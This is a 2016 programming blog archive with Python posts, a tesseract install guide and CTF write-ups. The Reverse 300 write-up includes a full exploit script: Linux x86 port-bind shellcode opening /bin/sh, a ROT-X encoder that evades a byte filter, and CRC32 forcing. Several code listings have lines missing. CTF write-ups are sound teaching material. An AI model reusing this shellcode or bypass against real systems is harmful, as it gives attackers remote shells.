Thursday, December 22, 2016

Computer Networks book

Finally finished a book "Computer Networks" by Andrew S. Tanenbaum and Davis Wetherall.
It is really good academic introduction for everyone interested in and works with computer networks.
A good explanation of how the networks works on each level is given. All popular protocols, network security, encryption and compression algorithms are reviewed. This book helps to organize knowledge about all these issues.
Moreover at the end of this book (and in the text of each chapter) a good list of further reading is included.
Highly recommend to look at this book.

Sunday, December 4, 2016

Insidious CodeType, or from segfault to a working code

Today I've made a 30-minutes blitz talk at ITGM with Andrey Zakharevich about a real problem with Segmentation Fault in CPython when special function has been generated.

ITGM #9 - Insidious CodeType, or from segfault to a working code (In Russian)

Saturday, October 22, 2016

Hack You SPb 2016 - Reverse 300 writeup

Task is called Serious Business, author: Arthur Hanov (awengar).
Task comment: nc 3177, and give me a shell.

We are given a binary file rev300_f3c8cc9.elf and address/port with service.

After disassembling and restoring the important functions from the binary, it became clear how to solve this task. By the way this task is also could be in Pwn category.
I've renamed some variables:
int filter(char *buf, int size)
    int i;
    for (i = 0; i < size; ++i)
        if (buf[i] == 1 || buf[i] == 0 || buf[i] == 47 || buf[i] == 115 || buf[i] == 104)
            return 0;
    return 1;
ssize_t handler(int fd)
    ssize_t result;
    unsigned int buf_size;
    int v3;
    char *buf;
    int v5;

    buf_size = 0;
    result = recv(fd, &buf_size, 4, 0);
    if (result == 4)
        result = buf_size;
        if (buf_size <= 200)
            buf = (char *)mmap(0, buf_size, 7, 33, -1, 0);
            v3 = recv(fd, buf, buf_size, 0);
            result = crc32(0, buf, buf_size);
            v5 = result;
            if (result == 0xCAFEBABE)
                result = filter(buf, buf_size) ^ 1;
                if (!(_BYTE)result)
                    result = ((int (*)(void))buf)();
    return result;

As you can see in the handler function there is a possibility to pass binary instructions in buf and execute them.
But to reach this line of code it is required:
1) A first recv() return value (size of received data) must be equal to 4 bytes.
2) A buf_size value received from first recv() must be less or equal 200.
In other words buf_size is shellcode_size.
3) A CRC32 of a buf value received from a second recv() must be equal to 0xCAFEBABE in hex.
The buf here is our shellcode.
4) The buf must not contain 0x1, 0x0, '/', 's', 'h' chars.

So we need to send 4 bytes (int value) with size of shellcode, and then send shellcode itself (with correct CRC32 value). I've found that it is possible to force CRC32 to any value from data by adding 4 bytes to this data.
To bypass filter I've used ROT-X shellcode encoding.
As a shellcode I've chosen a port bind shellcode from

Final script to solve this task:
import socket
import struct

# Ported to Python code from: 

CRCPOLY = 0xEDB88320
CRCINV = 0x5B358FD3  # inverse poly of (x^N) mod CRCPOLY

def make_crc_table(table):
    c = 0
    for n in xrange(256):
        c = n
        for k in xrange(8):
            if (c & 1) != 0:
                c = CRCPOLY ^ (c >> 1)
                c = c >> 1
        table[n] = c

def make_crc_revtable(table):
    for n in xrange(256):
        c = n << 3 * 8
        for k in xrange(8):
            if (c & 0x80000000) != 0:
                c = ((c ^ CRCPOLY) << 1) | 1
                c <<= 1
        table[n] = c

def crc32_tabledriven(buf, length, crc_table):
    crcreg = INITXOR
    for i in xrange(length):
        crcreg = (crcreg >> 8) ^ crc_table[((crcreg ^ ord(buf[i])) & 0xFF)]
    return crcreg ^ FINALXOR

def fix_crc_pos(buf, length, tcrcreg, fix_pos, crc_table, crc_revtable):
    # make sure fix_pos is within 0..(length -1)
    fix_pos = ((fix_pos % length) + length) % length

    # calculate crc register at position fix_pos; this is essentially crc32()
    crcreg = INITXOR
    for i in xrange(fix_pos):
        crcreg = (crcreg >> 8) ^ crc_table[((crcreg ^ ord(buf[i])) & 0xFF)]

    # inject crcreg as content
    for i in xrange(4):
        buf[fix_pos + i] = chr((crcreg >> i * 8) & 0xFF)

    # calculate crc backwards to fix_pos, beginning at the end
    tcrcreg ^= FINALXOR
    for i in xrange(length - 1, fix_pos - 1, -1):
        tcrcreg = (tcrcreg << 8) ^ crc_revtable[(tcrcreg >> 3 * 8) & 0xff] ^ ord(buf[i])

    # inject new content
    for i in xrange(4):
        buf[fix_pos + i] = chr((tcrcreg >> i * 8) & 0xFF)

# fill crc32 table and crc32 reverse table
crc32_tab = [0 for _ in xrange(256)]
crc32_tab_reverse = [0 for _ in xrange(256)]

def enc_shellcode_using_rot_x(shellcode, rot_x):
    """Encode shellcode using ROT-X value"""
    # Modified shellcode ROT-X decoder for Linux Intel/x86 from:
    encoded_shellcode = ''
    for c in bytearray(shellcode):
        if c > 255 - rot_x:
            encoded_shellcode += '%c' % (rot_x - (256 - c))
            encoded_shellcode += '%c' % (c + rot_x)
    rot_decoder = '\xeb\x25\x5e\x31\xc9\xb1' + chr(len(shellcode)) + '\x80\x3e' + chr(rot_x) + \
        '\x7c\x05\x80\x2e' + chr(rot_x) + '\xeb\x11\x31\xdb\x31\xd2\xb3' + chr(rot_x) + \
    return rot_decoder + encoded_shellcode

def filter_check(data):
    """Filter func"""
    for c in data:
        if ord(c) in [0x00, 0x01, 0x2F, 0x73, 0x68]:
            return 0
    return 1

def crc32(data):
    """CRC32 function"""
    crc = 0xFFFFFFFF
    for c in data:
        crc = crc32_tab[((crc) ^ ord(c)) & 0xff] ^ (((crc) >> 8) & 0xffffff)
    return ~crc

def force_crc32(data, crc32_value):
    """Force data to CRC32 value by appending four bytes to data"""
    new_data = list(data + '\x00\x00\x00\x00')
    fix_crc_pos(new_data, len(new_data), crc32_value, len(new_data) - 4, crc32_tab, crc32_tab_reverse)
    new_data_crc32 = crc32_tabledriven(new_data, len(new_data), crc32_tab)
    if crc32_value != new_data_crc32:
        print 'Failed to force data to CRC32!'
    return new_data

def main():
    # Portbind shellcode 86 bytes for Linux/x86 from

    shellcode = (
    # socket(AF_INET, SOCK_STREAM, 0)
    "\x6a\x66"              # push   $0x66
    "\x58"                  # pop    %eax
    "\x6a\x01"              # push   $0x1
    "\x5b"                  # pop    %ebx
    "\x99"                  # cltd
    "\x52"                  # push   %edx
    "\x53"                  # push   %ebx
    "\x6a\x02"              # push   $0x2
    "\x89\xe1"              # mov    %esp,%ecx
    "\xcd\x80"              # int    $0x80

    # bind(s, server, sizeof(server))
    "\x52"                  # push   %edx
    "\x66\x68\xfc\xc9"      # pushw  $0xc9fc  // PORT = 64713
    "\x66\x6a\x02"          # pushw  $0x2
    "\x89\xe1"              # mov    $esp,%ecx
    "\x6a\x10"              # push   $0x10
    "\x51"                  # push   %ecx
    "\x50"                  # push   %eax
    "\x89\xe1"              # mov    %esp,%ecx
    "\x89\xc6"              # mov    %eax,%esi
    "\x43"                  # inc    %ebx
    "\xb0\x66"              # mov    $0x66,%al
    "\xcd\x80"              # int    $0x80

    # listen(s, anything) 
    "\xb0\x66"              # mov    $0x66,%al
    "\xd1\xe3"              # shl    %ebx
    "\xcd\x80"              # int    $0x80

    # accept(s, 0, 0)
    "\x52"                  # push   %edx
    "\x56"                  # push   %esi
    "\x89\xe1"              # mov    %esp,%ecx
    "\x43"                  # inc    %ebx
    "\xb0\x66"              # mov    $0x66,%al
    "\xcd\x80"              # int    $0x80

    "\x93"                  # xchg   %eax,%ebx

    # dup2(c, 2) , dup2(c, 1) , dup2(c, 0)
    "\x6a\x02"              # push   $0x2
    "\x59"                  # pop    %ecx

    "\xb0\x3f"              # mov    $0x3f,%al
    "\xcd\x80"              # int    $0x80
    "\x49"                  # dec    %ecx
    "\x79\xf9"              # jns    dup_loop

    # execve("/bin/sh", ["/bin/sh"], NULL)
    "\x6a\x0b"              # push   $0xb
    "\x58"                  # pop    %eax
    "\x52"                  # push   %edx
    "\x68\x2f\x2f\x73\x68"  # push   $0x68732f2f
    "\x68\x2f\x62\x69\x6e"  # push   $0x6e69622f
    "\x89\xe3"              # mov    %esp, %ebx
    "\x52"                  # push   %edx
    "\x53"                  # push   %ebx
    "\x89\xe1"              # mov    %esp, %ecx
    "\xcd\x80"              # int    $0x80

    full_shellcode = enc_shellcode_using_rot_x(shellcode, 12)
    sc_with_crc32 = ''.join(force_crc32(full_shellcode, 0xcafebabe))

    if (0xffffffff + crc32(sc_with_crc32) + 1 if crc32(sc_with_crc32) < 0 else crc32(sc_with_crc32)) != 0xcafebabe:
        print 'CRC32 != 0xcafebabe'

    if filter_check(sc_with_crc32) != 1:
        print 'Filter check failed'
    # connect and send final shellcode
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('', 3177))
    length = struct.pack('<I', len(sc_with_crc32))

if __name__ == '__main__':

After executing the script, I've connected to where a shell was opened.
In the directory I've found a flag file and other files. So I've got the flag:
cat flag

Success! :)

P.S. I've also read a source code of rev300.cpp:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <signal.h>

#define PORT "3177"  // the port users will be connecting to
#define BACKLOG 10  // how many pending connections queue will hold

void sigchld_handler(int s){
 // waitpid() might overwrite errno, so we save and restore it:
 int saved_errno = errno;
 while(waitpid(-1, NULL, WNOHANG) > 0);
 errno = saved_errno;

void *get_in_addr(struct sockaddr *sa){
 if (sa->sa_family == AF_INET) {
  return &(((struct sockaddr_in*)sa)->sin_addr);
 return &(((struct sockaddr_in6*)sa)->sin6_addr);
void handler(int sock);
int main(void){
 int sockfd, new_fd;  // listen on sock_fd, new connection on new_fd
 struct addrinfo hints, *servinfo, *p;
 struct sockaddr_storage their_addr; // connector's address information
 socklen_t sin_size;
 struct sigaction sa;
 int yes=1;
 int rv;

 memset(&hints, 0, sizeof hints);
 hints.ai_family = AF_UNSPEC;
 hints.ai_socktype = SOCK_STREAM;
 hints.ai_flags = AI_PASSIVE; // use my IP

 if ((rv = getaddrinfo(NULL, PORT, &hints, &servinfo)) != 0) {
  fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(rv));
  return 1;

 // loop through all the results and bind to the first we can
 for(p = servinfo; p != NULL; p = p->ai_next) {
  if ((sockfd = socket(p->ai_family, p->ai_socktype,
    p->ai_protocol)) == -1) {
   perror("server: socket");
  if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes,
    sizeof(int)) == -1) {
  if (bind(sockfd, p->ai_addr, p->ai_addrlen) == -1) {
   perror("server: bind");
 freeaddrinfo(servinfo); // all done with this structure
 if (p == NULL)  {
  fprintf(stderr, "server: failed to bind\n");
 if (listen(sockfd, BACKLOG) == -1) {
 sa.sa_handler = sigchld_handler; // reap all dead processes
 sa.sa_flags = SA_RESTART;
 if (sigaction(SIGCHLD, &sa, NULL) == -1) {
 printf("server: waiting for connections...\n");
 while(1) {  // main accept() loop
  sin_size = sizeof their_addr;
  new_fd = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size);
  if (new_fd == -1) {

  inet_ntop(their_addr.ss_family, get_in_addr((struct sockaddr *)&their_addr),s, sizeof s);
  printf("server: got connection from %s\n", s);

  if (!fork()) { // this is the child process
   close(sockfd); // child doesn't need the listener
   // if (send(new_fd, "Hello, world!", 13, 0) == -1)
    // perror("send");
  close(new_fd);  // parent doesn't need this

 return 0;
#include <sys/param.h>

static uint32_t crc32_tab[] = {
 0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419, 0x706af48f,
 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988,
 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91, 0x1db71064, 0x6ab020f2,
 0xf3b97148, 0x84be41de, 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7,
 0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9,
 0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172,
 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b, 0x35b5a8fa, 0x42b2986c,
 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59,
 0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423,
 0xcfba9599, 0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924,
 0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190, 0x01db7106,
 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433,
 0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d,
 0x91646c97, 0xe6635c01, 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e,
 0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950,
 0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65,
 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, 0x4adfa541, 0x3dd895d7,
 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0,
 0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa,
 0xbe0b1010, 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f,
 0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17, 0x2eb40d81,
 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a,
 0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, 0xe3630b12, 0x94643b84,
 0x0d6d6a3e, 0x7a6a5aa8, 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1,
 0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb,
 0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc,
 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, 0xd6d6a3e8, 0xa1d1937e,
 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b,
 0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55,
 0x316e8eef, 0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236,
 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe, 0xb2bd0b28,
 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d,
 0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, 0x9c0906a9, 0xeb0e363f,
 0x72076785, 0x05005713, 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38,
 0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242,
 0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777,
 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, 0x8f659eff, 0xf862ae69,
 0x616bffd3, 0x166ccf45, 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2,
 0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc,
 0x40df0b66, 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9,
 0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605, 0xcdd70693,
 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94,
 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d

uint32_t crc32(uint32_t crc, char *buf, size_t size)
 const char *p;
 p = buf;
 crc = crc ^ ~0U;

 while (size--)
  crc = crc32_tab[(crc ^ *p++) & 0xFF] ^ (crc >> 8);

 return crc ^ ~0U;
bool filter(char * mem,int size){
 for (int i=0; i<size; i++){
  if (mem[i] == 0x80 || mem[i] == 0xCD || mem[i] == 0x01 || mem[i] == 0x00 || mem[i] == '/' || mem[i] == 's' || mem[i] == 'h')
   return false;
 return true;
void handler(int sock){
 unsigned int len=0;
 char * buf;
 int num_recv = recv(sock, ((char *) &len), 4, 0);
 if (num_recv != 4 || len > 200)
 char * mem = (char *)mmap(0, len , PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_ANON, -1, 0);
 num_recv = recv(sock, mem, len, 0);
 unsigned int sum = crc32(0,mem,len);
 if (sum != 0xCAFEBABE)
 if (!filter(mem,len))
 (*(void  (*)()) mem)();

Hack You SPb 2016 - Stegano 300 writeup

This task is by Vlad Roskov (vos) and called Gemorroy (i. e. Hemorrhoid).
We are given a png image:

I've written simple Python script to get all IDAT blocks from png image and decompress them.

import struct
import zlib

with open('steg300_where_8c7f6f7.png', 'rb') as f:
    data =

# get all IDAT blocks
idats = []
while True:
    idat_pos = data.find('IDAT')
    if idat_pos < 0:
    size = struct.unpack('>I', data[idat_pos - 4:idat_pos])[0]
    idats.append(data[idat_pos + 4:idat_pos + 4 + size])
    data = data[idat_pos + 4:]

# concat all blocks
idats_str = ''.join(idats)

# decompress IDAT blocks
d = zlib.decompressobj()

At the end of decoded data we've got the next part - a link: :)
The link is with a high frequency video with a sequence of QR-codes. So, we need to go deeper...
Using ffmpeg I've extracted all the frames from this video.
And then using zbar I've decoded all QR codes. After concatenation I've got the next data string:

First four bytes are "Rar!", i.e. it is a RAR archive with flag.txt inside.
After extracting I got a flag:
Flag: 57364N0_w1th1n_57364N0_1m_d0ne

Hack You SPb 2016

I've played Hack You SPb CTF this week and it finished today.
I've solved 16 out of 18 tasks, and ranked 10th.

Here are my write-ups:

Monday, October 3, 2016

COUB popular songs analysis

I've written simple script in Python to get all best of the week coubs.
First version of the script was really slow. It required almost 5 minutes to get all 6084 coubs.
So I've rewritten it using multiprocessing module for parallelism. And I got almost x6 speedup - multiprocessing version has taken just half a minute to get all 6084 coubs.
Then I've used Counter from collections to get most common song titles.
Also I've updated most common titles using algorithm that searches similar (but not equal) titles by replacing some of its symbols.
Here is statistics I got:

I've published sources on my github

Wednesday, September 21, 2016

Python dictionary: Past, Present, Future

I've made a presentation about Python dictionary on SPb Python meetup yesterday.
Thanks to all who came to the meetup :)

In my talk I've made a review of how the dictionary in CPython 2.x works. Also I've discussed dictionary in CPython 3.x, and reviewed the changes in CPython 3.6.
In addition to CPython I've superficially reviewed the internal work of dictionary in alternative Python implementation such as PyPy, IronPython and Jython.

Friday, August 26, 2016


Any sufficiently complicated C or Fortran program contains an ad hoc, informally-specified, bug-ridden, slow implementation of half of Common Lisp — Philip Greenspun 
Organizations which design systems ... are constrained to produce designs which are copies of the communication structures of these organizations — Melvin Conway

Sunday, August 14, 2016

Aztec Code generator in Python

When I was in Europe I've noticed unusual 2D barcodes printed on train tickets. These codes are called Aztec Code. I've already seen this code when played the CTF games.
I've decided to understand the principle of encoding and create Aztec code generator in Python. It shouldn't be so hard, because I've already understood the principles of QR Code encoding recently.
I've found a specification (surprisingly in Russian) describing the Aztec Code and created github repository. 
The most difficult part was to implement the algorithm of searching the optimal encoding sequence from the specification.
Source code of my version of Aztec code generator in Python on github:
Here are some resulting Aztec codes:
This is 71x71 Aztec code with 394 '\x00' bytes :

And this one is with 394 '\xff' bytes:

And here is 53x53 Aztec code with 433 "3" digits:

Tuesday, June 14, 2016

Amusing QR codes

This weekend I've implemented own QR Code generator in pure Python. The link to github repository:
I want to share amusing QR codes I've found during testing of my QR code generator.
A mode is "numeric", error correction level is "Q", here version is 20 (97 x 97), masks 0 to 7.
module size is 2 pixels.
The encoded data contain only zeros, so the error correction codes also contain zeros. That's why the patterns are so uniform.

Thursday, April 28, 2016

Maximum lines of code for Python script

I've created a script with 10 million non-empty and non-comment lines. Python process has consumed over 10 Gigs of RAM, but successfully executed :)

So what is the maximum lines of code permitted in Python?
No limitation.

Sunday, April 24, 2016

Python frozen modules __hello__ and __phello__

Under Python 2.7:
>>> import __hello__
Hello world...
>>> import __phello__
Hello world...
>>> import __phello__.spam
Hello world...

Under Python 3.x:
>>> import __hello__
Hello World!

If check a file of this modules the next result will be returned:
>>> __hello__.__file__

The byte-code of these modules (see Python' source file ./Python/frozen.c) is compiled into Python lib (python27.dll on Windows and on Linux).

To check whether the module is frozen it's possible to use imp.is_frozen:
>>> import imp
>>> imp.is_frozen('__hello__')
>>> imp.is_frozen('__phello__')
>>> imp.is_frozen('__phello__.spam')

It's also possible to get the code object of these modules and for example get the bytecode:
>>> imp.get_frozen_object('__phello__.spam').co_code

Or get the code object filename:
>>> imp.get_frozen_object('__hello__').co_filename
>>> imp.get_frozen_object('__phello__').co_filename
>>> imp.get_frozen_object('__phello__.spam').co_filename

To load a frozen module Python C API function PyImport_ImportFrozenModule is used.

Thursday, April 14, 2016

Python anonymous class name with anonymous class variable name

In Python it is possible to create new type object without any name (or more precisely with an empty name).
Moreover, you can create an anonymous (empty) class variable.
For example to create Phantom class with anonymous (empty) class variable:
>>> Phantom = type('', (object,), {'': 'surprise'})
>>> p = Phantom()
>>> Phantom.__name__
>>> p.__class__
<class '__main__.'>
>>> getattr(p, '')

Sunday, April 10, 2016

Python hashlib algorithms

It's very interesting that some algorithms from Python hashlib module are not documented, for example SHA which is SHA-0.

>>> import hashlib
>>> h ='sha')
>>> h.update(b'')
>>> h.hexdigest()

The reason of such behavior is loading of these algorithms using _hashlib module, which is based on OpenSSL library available on your platform. Therefore, these additional algorithms may vary.

Here is how hashlib new() constructor is assigned based on _hashlib (OpenSSL) module availability (from

    import _hashlib
    new = __hash_new
    __get_hash = __get_openssl_constructor
    algorithms_available = algorithms_available.union(
except ImportError:
    new = __py_new
    __get_hash = __get_builtin_constructor

By default only several hash algorithms are always available in hashlib module.
You can check all of them using hashlib.algorithms_available (was added in version 2.7.9):
>>> hashlib.algorithms
('md5', 'sha1', 'sha224', 'sha256', 'sha384', 'sha512')

Additional algorithms available by hashlib.algorithms_available (was added in version 2.7.9):
>>> hashlib.algorithms_available
{'SHA384', 'MD5', 'sha512', 'MD4', 'RIPEMD160', 'dsaEncryption', 'SHA224', 'SHA', 'sha', 'ecdsa-with-SHA1', 'md5', 'whirlpool', 'dsaWithSHA', 'SHA1', 'sha1', 'sha384', '
DSA', 'sha224', 'md4', 'ripemd160', 'DSA-SHA', 'SHA512', 'SHA256', 'sha256'}

Saturday, February 13, 2016

Octree color quantizer in Python

Some time ago I found interesting octree color quantization algorithm, previously often used in computer graphics (when devices can display only a limited number of colors), and nowadays mainly used in gif images.

I've implemented one of the most used algorithm of octree color quantization in Python. Here is a repository on github:

Original image (24 bit):

 Result image (colors reduced to 8 bit):

Result image palette:

Octree is a tree where each node has up to 8 children. Leaf node has no active children.
Each leaf node have a number of pixels with this color (pixel_count) and color value.

1) Addition of a new color to the octree.
Start at the level 0.
For example a pixel RGB color is (90, 13, 157). In binary it is (01011010, 01110001, 10011101).
The next level node index is calculated the following way:
Write in binary R, G and B bits, starting from MSB, for current level. So the index will be from 000 to 111 (binary), i.e. from 0 to 7 (decimal).
If the maximum depth of tree is less than 8, only first bits of color will matter.
Here is the image with first steps of addition the color:
If we have a tree with maximum depth of 8, eventually we will have the next indices:
The full tree with depth 8 after add the color (90, 113, 157):
If the next pixel color is again (90, 113, 157), the leaf node color R, G, B values will be increased by new color R, G, B values as well as the value of pixels with this color. And the color will be (180, 226, 314) and pixel_count will be 2:

2) Reduction
To make image color palette with for example 256 colors maximum, from palette with far more colors the tree leaves must be reduced.
The reduction of nodes:
As we have a sum of R, G and B values and the number of pixels with this color, we can add all leaves pixels count and color channels to parent node and make it a leaf node (we could not even remove it, because get leaves method will not go deeper if current node is leaf).
Reduction continues while leaves count it more than needed maximum colors (in our case 256).
The main disadvantage of this approach is that up to 8 leaves can be reduced from node and the palette could have only 248 colors (in worst case) instead of expected 256 colors.
As soon as we've got count of leaves less or equal needed maximum colors we can build a palette.

3) Palette building
Palette is filled with average colors, from each leaf. As each leaf has the number of pixels with color and color's sum of R, G and B values, average color could be received by dividing color channels by the number of pixels: palette_color = (color.R / pixel_count, color.G/ pixel_count,  color.B / pixel_count).

Wednesday, February 3, 2016

Installing tesseract for python on Ubuntu 15.10

Some time ago I've already written a tutorial how to install tesseract for python on Ubuntu 14.04.
And today I've struggled with the new challenges during the installation of tesseract and python-tesseract on Ubuntu 15.10. So here is my way to make it usable.

user@server:~$ cat /etc/lsb-release

Install packages
sudo apt-get install python-distutils-extra tesseract-ocr tesseract-ocr-eng libopencv-dev libtesseract-dev libleptonica-dev python-all-dev swig libcv-dev python-opencv python-numpy python-setuptools build-essential subversion git
sudo apt-get install autoconf automake libtool
sudo apt-get install libpng12-dev libjpeg62-dev libtiff4-dev zlib1g-dev

Download leptonica

tar xvf leptonica-1.73.tar.gz

build it

cd leptonica-1.73
make install

Download tesseract-ocr


tar xvf 3.04.00.tar.gz
cd tesseract-3.04.00
sudo make install
sudo ldconfig

And test:

user@server:~$ tesseract
  tesseract imagename|stdin outputbase|stdout [options...] [configfile...]

Check out `python-tesseract`

git clone

It's needed to update "baseapi_mini.h" file in ./python-tesseract/src/ folder:

class MutableIterator;
line: 85
class TessResultRenderer;

line 316:
  //void SetImage(const Pix* pix);
    void SetImage(Pix* pix);

line 477:
  bool ProcessPages(const char* filename,
                    const char* retry_config, int timeout_millisec,
                    STRING* text_out);
  bool ProcessPages(const char* filename, 
                    const char* retry_config, int timeout_millisec, 
                    TessResultRenderer* renderer);

line 493:
  bool ProcessPage(Pix* pix, int page_index, const char* filename,
                   const char* retry_config, int timeout_millisec,
                   STRING* text_out);
  bool ProcessPage(Pix* pix, int page_index, const char* filename,
                   const char* retry_config, int timeout_millisec,
                   TessResultRenderer* renderer);

It's needed to update "main.cpp" file in ./python-tesseract/src/ folder:

line: 15
#include "renderer.h"

line: 64
char* ProcessPagesWrapper(const char* image,tesseract::TessBaseAPI* api) {
const char *data = "";
tesseract::TessTextRenderer renderer(data);
api->ProcessPages(image, NULL, 0, &renderer);
return api->GetUTF8Text();

line: 73
char* ProcessPagesPix(const char* image,tesseract::TessBaseAPI* api) {
const char *data = "";    
tesseract::TessTextRenderer renderer(data);
int page=0;
Pix *pix;
pix = pixRead(image);
api->ProcessPage(pix, page, NULL, NULL, 0, &renderer);
return api->GetUTF8Text();

line: 86
char* ProcessPagesFileStream(const char* image,tesseract::TessBaseAPI* api) {
Pix *pix;
const char *data = "";
tesseract::TessTextRenderer renderer(data);
int page=0;
FILE *fp=fopen(image,"rb");
api->ProcessPage(pix, page, NULL, NULL, 0, &renderer);
return api->GetUTF8Text();

line 107:
char* ProcessPagesBuffer(char* buffer, int fileLen, tesseract::TessBaseAPI* api) {
FILE *stream;
if (stream == NULL) {
puts("cant't open stream using fmemopen");
return (char*)"Error";
Pix *pix;
int page=0;
const char *data = "";
tesseract::TessTextRenderer renderer(data);
if (stream != NULL)
api->ProcessPage(pix, page, NULL, NULL, 0, &renderer);
return api->GetUTF8Text();

and build it:

python clean
python build
sudo python install

After that try to run your python example.

If you'll get such error:
Error opening data file ./tessdata/eng.traineddata
Please make sure the TESSDATA_PREFIX environment variable is set to the parent directory of your "tessdata" directory.
Failed loading language 'eng'
Tesseract couldn't load any languages!
AdaptedTemplates != NULL:Error:Assert failed:in file adaptmatch.cpp, line 174
Segmentation fault (core dumped)

You could fix it by patching "mainblk.cpp" file inside tesseract-3.04.00/ccutil/ folder the next way:

 In the "mainblk.cpp" file code:

  if (argv0 != NULL) {
    datadir = argv0;
  } else {
    if (getenv("TESSDATA_PREFIX")) {
      datadir = getenv("TESSDATA_PREFIX");
    } else {
#define _STR(a) #a
#define _XSTR(a) _STR(a)
    datadir = _XSTR(TESSDATA_PREFIX);
#undef _XSTR
#undef _STR

  // insert code here

  // datadir may still be empty:
  if (datadir.length() == 0) {
    datadir = "./";

add into "insert code here" place the next code:

  if (getenv("TESSDATA_PREFIX")) {
      datadir = getenv("TESSDATA_PREFIX");
  } else {
    // check dir with tessdata
    struct stat sb;
    if (stat("/usr/share/tesseract-ocr/tessdata", &sb) == 0 && S_ISDIR(sb.st_mode)) {    
      datadir = "/usr/share/tesseract-ocr";

and include the next:

#include <sys/stat.h>

Rebuild and reinstall tesseract-ocr:

cd tesseract-3.04.00
sudo make install

So, after that, if you have TESSDATA_PREFIX env variable, it will be loaded, and if you have tessdata folder with files in /usr/share/tesseract-ocr/ it will be loaded, otherwise directory with your python example module (./) will be checked for tessdata folder.

Test installed python tesseract using the tests in test folder:

user@server:~/python-tesseract/src/test$ python
result(ProcessPagesWrapper)= The (quick) [brown] {fox} jumps!
Over the $43,456.78 <lazy> #90 dog
& duck/goose, as 12.5% of E-mail
from is spam.
Der ,,schnelle” braune Fuchs springt
fiber den faulen Hund. Le renard brun
«rapide» saute par-dessus le chien
paresseux. La volpe marrone rapida
salta sopra i] cane pigro. El zorro
marrén répido salta sobre el perro
perezoso. A raposa marrom répida
salta sobre 0 C50 preguieoso.

result(ProcessPagesFileStream)= The (quick) [brown] {fox} jumps!
Over the $43,456.78 <lazy> #90 dog
& duck/goose, as 12.5% of E-mail
from is spam.
Der ,,schnelle” braune Fuchs springt
fiber den faulen Hund. Le renard brun
«rapide» saute par-dessus le chien
paresseux. La volpe marrone rapida
salta sopra i] cane pigro. El zorro
marrén répido salta sobre el perro
perezoso. A raposa marrom répida
salta sobre 0 C50 preguicoso.

